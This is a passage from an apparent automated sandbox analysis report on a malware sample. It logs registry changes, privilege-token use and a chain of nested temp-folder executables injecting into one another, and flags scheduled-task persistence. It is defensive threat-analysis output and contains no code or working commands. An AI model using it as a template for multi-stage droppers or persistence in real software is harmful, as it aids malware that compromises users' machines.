Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3sO37sU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3sO37sU.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3sO37sU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\514C.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\5556.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\568F.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4764 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OT2If21.exe
PID 4764 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OT2If21.exe
PID 4764 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OT2If21.exe
PID 4864 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OT2If21.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe
PID 4864 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OT2If21.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe
PID 4864 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OT2If21.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe
PID 232 wrote to memory of 3136 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe
PID 232 wrote to memory of 3136 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe
PID 232 wrote to memory of 3136 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe
PID 3136 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe
PID 3136 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe
PID 3136 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe
PID 2656 wrote to memory of 3244 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe
PID 2656 wrote to memory of 3244 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe
PID 2656 wrote to memory of 3244 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe
PID 2656 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2oB5870.exe
PID 2656 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2oB5870.exe
PID 2656 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2oB5870.exe
PID 3136 wrote to memory of 3100 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3sO37sU.exe
PID 3136 wrote to memory of 3100 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3sO37sU.exe
PID 3136 wrote to memory of 3100 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3sO37sU.exe
PID 232 wrote to memory of 3920 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ql522dO.exe
PID 232 wrote to memory of 3920 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ql522dO.exe
PID 232 wrote to memory of 3920 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ql522dO.exe
PID 3124 wrote to memory of 2580 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\4D7F.exe
PID 3124 wrote to memory of 2580 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\4D7F.exe
PID 3124 wrote to memory of 2580 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\4D7F.exe
PID 3124 wrote to memory of 2568 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\4E4B.exe
PID 3124 wrote to memory of 2568 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\4E4B.exe
PID 3124 wrote to memory of 2568 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\4E4B.exe
PID 2580 wrote to memory of 3188 N/A C:\Users\Admin\AppData\Local\Temp\4D7F.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\xN8VP0Pk.exe
PID 2580 wrote to memory of 3188 N/A C:\Users\Admin\AppData\Local\Temp\4D7F.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\xN8VP0Pk.exe
PID 2580 wrote to memory of 3188 N/A C:\Users\Admin\AppData\Local\Temp\4D7F.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\xN8VP0Pk.exe
PID 3124 wrote to memory of 3648 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3124 wrote to memory of 3648 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3188 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\xN8VP0Pk.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\PO0GY9Kh.exe
PID 3188 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\xN8VP0Pk.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\PO0GY9Kh.exe
PID 3188 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\xN8VP0Pk.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\PO0GY9Kh.exe
PID 3124 wrote to memory of 3864 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\5051.exe
PID 3124 wrote to memory of 3864 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\5051.exe
PID 3124 wrote to memory of 3864 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\5051.exe
PID 2700 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\PO0GY9Kh.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\nR7Ki5xF.exe
PID 2700 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\PO0GY9Kh.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\nR7Ki5xF.exe
PID 2700 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\PO0GY9Kh.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\nR7Ki5xF.exe
PID 3124 wrote to memory of 1952 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\514C.exe
PID 3124 wrote to memory of 1952 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\514C.exe
PID 3124 wrote to memory of 1952 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\514C.exe
PID 4372 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\nR7Ki5xF.exe C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\xa9dg5Dd.exe
PID 4372 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\nR7Ki5xF.exe C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\xa9dg5Dd.exe
PID 4372 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\nR7Ki5xF.exe C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\xa9dg5Dd.exe
PID 1384 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\xa9dg5Dd.exe C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\1dx01lH8.exe
PID 1384 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\xa9dg5Dd.exe C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\1dx01lH8.exe
PID 1384 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\xa9dg5Dd.exe C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\1dx01lH8.exe
PID 3124 wrote to memory of 2704 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\5227.exe
PID 3124 wrote to memory of 2704 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\5227.exe
PID 3124 wrote to memory of 2704 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\5227.exe
PID 3124 wrote to memory of 4436 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\548A.exe
PID 3124 wrote to memory of 4436 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\548A.exe
PID 3124 wrote to memory of 4436 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\548A.exe
PID 3124 wrote to memory of 860 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\5556.exe
PID 3124 wrote to memory of 860 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\5556.exe
PID 3124 wrote to memory of 860 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\5556.exe
PID 3124 wrote to memory of 60 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\568F.exe
PID 3124 wrote to memory of 60 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\568F.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OT2If21.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OT2If21.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2oB5870.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2oB5870.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3sO37sU.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3sO37sU.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ql522dO.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ql522dO.exe

C:\Users\Admin\AppData\Local\Temp\4D7F.exe

C:\Users\Admin\AppData\Local\Temp\4D7F.exe

C:\Users\Admin\AppData\Local\Temp\4E4B.exe

C:\Users\Admin\AppData\Local\Temp\4E4B.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\xN8VP0Pk.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\xN8VP0Pk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4F56.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\PO0GY9Kh.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\PO0GY9Kh.exe

C:\Users\Admin\AppData\Local\Temp\5051.exe

C:\Users\Admin\AppData\Local\Temp\5051.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\nR7Ki5xF.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\nR7Ki5xF.exe

C:\Users\Admin\AppData\Local\Temp\514C.exe

C:\Users\Admin\AppData\Local\Temp\514C.exe

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\xa9dg5Dd.exe

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\xa9dg5Dd.exe

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\1dx01lH8.exe

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\1dx01lH8.exe

C:\Users\Admin\AppData\Local\Temp\5227.exe

